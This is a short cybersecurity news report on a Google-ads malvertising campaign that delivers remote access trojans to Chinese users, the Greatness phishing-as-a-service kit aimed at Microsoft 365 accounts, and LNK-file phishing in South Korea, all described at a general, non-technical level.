Chinese users face a targeted malvertising campaign through malicious Google ads promoting restricted messaging apps like Telegram. Malwarebytes' Jérôme Segura revealed that threat actors exploit Google advertiser accounts to create these deceptive ads, leading users to download Remote Administration Trojans (RATs). The ongoing campaign, known as FakeAPP, is a continuation of a prior assault that initially targeted Hong Kong users searching for messaging apps in late October 2023. The attackers have expanded their tactics by adding LINE to the list of targeted messaging apps, redirecting users to fraudulent websites on Google Docs or Google Sites.

The malicious Google infrastructure embeds links controlled by threat actors, delivering installer files that deploy trojans like PlugX and Gh0st RAT. Malwarebytes traced the fraudulent ads to two advertiser accounts, Interactive Communication Team Limited and Ringier Media Nigeria Limited, based in Nigeria. The threat actor appears to prioritize quantity over quality, constantly introducing new payloads and infrastructure for command-and-control purposes.

In a related development, Trustwave SpiderLabs highlighted a surge in the use of a phishing-as-a-service (PhaaS) platform called Greatness, priced at $120 per month. Greatness facilitates the creation of authentic-looking credential harvesting pages targeting Microsoft 365 users. It allows personalization of various elements, such as sender names, email addresses, subjects, messages, attachments, and QR codes, enhancing relevance and engagement. The kit is sold to criminal actors, making it more accessible and enabling large-scale attacks.

Attack chains in these phishing campaigns involve sending emails with malicious HTML attachments that direct recipients to fake login pages, capturing login credentials, and transmitting them to the threat actor via Telegram. Some attack sequences deploy malware on victims' machines to facilitate information theft. The phishing emails often use tactics like spoofing trusted sources, such as banks and employers, and create a false sense of urgency with subjects like "urgent invoice payments" or "urgent account verification required."

Trustwave noted the widespread use of Greatness, with its own Telegram community providing operational guidance and additional tips. Additionally, phishing attacks have been observed in South Korea, where malicious Windows shortcut (LNK) files impersonate tech companies like Kakao to distribute AsyncRAT. The disguised shortcut files can be mistaken for normal documents as the '.LNK' extension is not visible in the file names.

Source: https://thehackernews.com/2024/01/malicious-ads-on-google-target-chinese.html